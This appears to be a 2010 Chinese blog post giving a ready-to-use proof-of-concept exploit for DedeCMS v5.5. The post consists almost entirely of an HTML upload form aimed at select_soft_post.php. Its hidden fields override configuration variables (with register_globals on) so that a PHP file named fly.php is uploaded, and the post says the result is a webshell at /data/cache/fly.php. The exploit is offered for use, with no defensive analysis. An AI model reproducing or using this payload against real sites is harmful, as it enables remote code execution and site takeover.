dedecms 55 漏洞

2010年1月23日星期六 | | |

<html><head><title>dedecms v55 upload poc by flyh4t</title></head>
<body>
<form action=http://127.0.0.1/include/dialog/select_soft_post.php method='post'

enctype="multipart/form-data" name='myform'>
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.en-closure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
select u shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br>ndde register_globals=on...
<br>
<br>webshell at  /data/cache/fly.php...<br>
</body></html>
 
我的QQ空间
SafeCms <= 2.0.1.0 Beta Cross Site Scripting
SSV ID:15203发布时间:2010-01-07测试方法:[www.sebug.net]本站...
 

0 评论:


所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]